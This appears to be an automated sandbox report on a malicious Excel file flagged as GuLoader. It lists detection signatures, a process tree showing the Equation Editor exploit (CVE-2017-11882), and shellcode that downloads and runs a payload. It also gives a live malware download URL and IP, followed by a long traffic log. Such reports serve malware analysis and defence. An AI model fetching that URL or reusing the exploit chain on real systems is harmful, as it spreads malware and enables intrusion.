Edit tour

Windows Analysis Report
ACP-2210825ORDER.xls

Overview

General Information

Sample Name:	ACP-2210825ORDER.xls
Analysis ID:	755822
MD5:	6c84860292e2a4d210396b7012be9b8a
SHA1:	7061c26320bf8836b55ac660860fa0937ae8f48e
SHA256:	cadae8bf6a2bcf1ee630695a250a481d22d0b6d409832f60070b118dfc3bca75
Tags:	xls
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Antivirus detection for dropped file

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Office equation editor establishes network connection

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores files to the Windows start menu directory

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

Document contains embedded VBA macros

PE file contains more sections than normal

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1036 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1168 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 1136 cmdline: "C:\Users\Public\vbc.exe" MD5: 7081C4822CF1C7572DD82822B8F27C49)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 172.245.34.91, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1168, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1168, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ACP-2210825ORDER.xls

Virustotal: Detection: 26%

Perma Link

Antivirus / Scanner detection for submitted sample

Source: ACP-2210825ORDER.xls

Avira: detected

Antivirus detection for URL or domain

Source: http://172.245.34.91/5643/VBC.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMP

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 172.245.34.91 Port: 80

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00406555 FindFirstFileW,FindClose,	5_2_00406555
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_00405A03
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040287E FindFirstFileW,	5_2_0040287E

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_035406CF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035406FD ShellExecuteW,ExitProcess,	2_2_035406FD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03540660 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03540660
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035405D4 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_035405D4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035405F0 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_035405F0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0354067A URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_0354067A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035405BB ExitProcess,	2_2_035405BB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03540722 ExitProcess,	2_2_03540722
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035406E8 ShellExecuteW,ExitProcess,	2_2_035406E8

Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
Source: global traffic	TCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
